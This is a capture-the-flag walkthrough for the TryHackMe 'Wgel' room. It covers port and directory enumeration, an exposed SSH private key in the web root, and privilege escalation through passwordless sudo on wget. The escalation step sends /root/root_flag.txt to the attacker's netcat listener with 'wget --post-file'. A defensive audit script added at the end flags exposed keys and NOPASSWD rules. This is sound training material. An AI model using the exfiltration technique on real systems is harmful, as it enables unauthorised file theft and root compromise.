tryhackme - wgel CTF
NMAP - network mapper
The first thing we do is a general nmap (network mapper) scan, so that we know which ports are open.
# nmap -sT -vv -sC -sV <ip>
HTTP
Summary of the nmap scan:
Two ports are open, 22 and 80. Port 22 is SSH, so we know an SSH login to this box is possible. Port 80 is HTTP, which means it is hosting a website, so let's open that IP in the browser.
gobuster
It looks like an Apache2 server, so I quickly got the idea of brute-forcing the website for files with some common extensions. To brute-force directories and extensions on a website we use a tool called gobuster.
Command: gobuster dir -u <site URL> -w <wordlist> -x <extensions>
root@:~# gobuster dir -u http://10.10.116.173/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)
So here we found a directory at /sitemap. I opened it in the browser and found this.
Let's check whether there are any further directories under it.
root@:~# gobuster dir -u http://10.10.116.173/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q
/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)
Yes! We found a .ssh directory. I opened it and found an id_rsa file, which is interesting.
Here is the id_rsa key.
Now remember from the start that an SSH connection is possible. Checking the source code of the first web page, we find a username: jessie.
user_flag.txt
Make sure you set the proper permissions on the id_rsa file first, because ssh refuses a private key that is readable by other users:
# chmod 600 id_rsa
Then run this command to connect:
# ssh -i id_rsa jessie@<ip address>
root_flag.txt
For privilege escalation, the first thing to know is sudo -l, which lists what the current user is allowed to run with sudo. I found that wget can be run as root with no password. That does not give us a payload running as root directly, so I got the idea of exploiting wget itself. First I started a listener on my machine, i.e. the attacker's machine:
# nc -lvnp 4444
Let's check GTFOBins for wget: https://gtfobins.github.io/gtfobins/wget/
Command: sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4444
Because wget runs as root here, it reads the flag file and sends its contents as the body of a POST request to our listener.
Then we go back to netcat:
# nc -lvnp 4444
The root flag shows up in the request received here.
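The two weaknesses this room chains together are a private key sitting inside the web root (the .ssh/id_rsa found with gobuster) and a passwordless sudo rule for wget. The following audit script is an added example, not part of the original writeup: it checks a document root for files that look like private keys and a sudoers file for NOPASSWD rules, using constructed fixtures (the directory layout and the exact sudoers line are assumptions) so it runs offline.

```shell
#!/bin/sh
# Added audit, not from the original writeup. It looks for the two
# weaknesses this room chains: a private key reachable via the web root
# and a passwordless sudo rule. Sample fixtures below are constructed.

# Print files under $1 whose content looks like a private key.
# Returns 1 when any are found so it can gate a hardening check.
find_exposed_keys() {
    hits=$(find "$1" -type f -exec grep -l -- \
        '-----BEGIN .*PRIVATE KEY-----' {} + 2>/dev/null || true)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits" | sed 's/^/EXPOSED KEY: /'
    return 1
}

# Print active (non-comment) NOPASSWD rules from the sudoers file $1.
# Returns 1 when any exist; a rule for a download tool such as wget is
# a root file-read primitive, as the writeup shows with --post-file.
find_nopasswd_rules() {
    rules=$(grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD' || true)
    [ -z "$rules" ] && return 0
    printf '%s\n' "$rules" | sed 's/^/NOPASSWD RULE: /'
    return 1
}

# Constructed web root with the layout gobuster found (sitemap/.ssh).
make_sample_webroot() {
    d=$(mktemp -d)
    mkdir -p "$d/sitemap/.ssh" "$d/sitemap/css"
    printf '%s\n' '<html>demo</html>' > "$d/sitemap/index.html"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'PLACEHOLDER, NOT A REAL KEY' \
        '-----END OPENSSH PRIVATE KEY-----' > "$d/sitemap/.ssh/id_rsa"
    echo "$d"
}

# Constructed sudoers fragment; the exact rule form is an assumption.
make_sample_sudoers() {
    f=$(mktemp)
    printf '%s\n' '# passwordless wget, as sudo -l revealed in the room' \
        'jessie ALL=(root) NOPASSWD: /usr/bin/wget' > "$f"
    echo "$f"
}

# Demo on the fixtures; on a real host point these at the document root
# (e.g. /var/www/html) and /etc/sudoers instead.
find_exposed_keys "$(make_sample_webroot)" || echo "-> move the key out of the web root"
find_nopasswd_rules "$(make_sample_sudoers)" || echo "-> require a password or drop the rule"
```

Each function exits non-zero on a finding, so the script can be dropped into a deployment or hardening check that fails the build when a key or a passwordless rule is present.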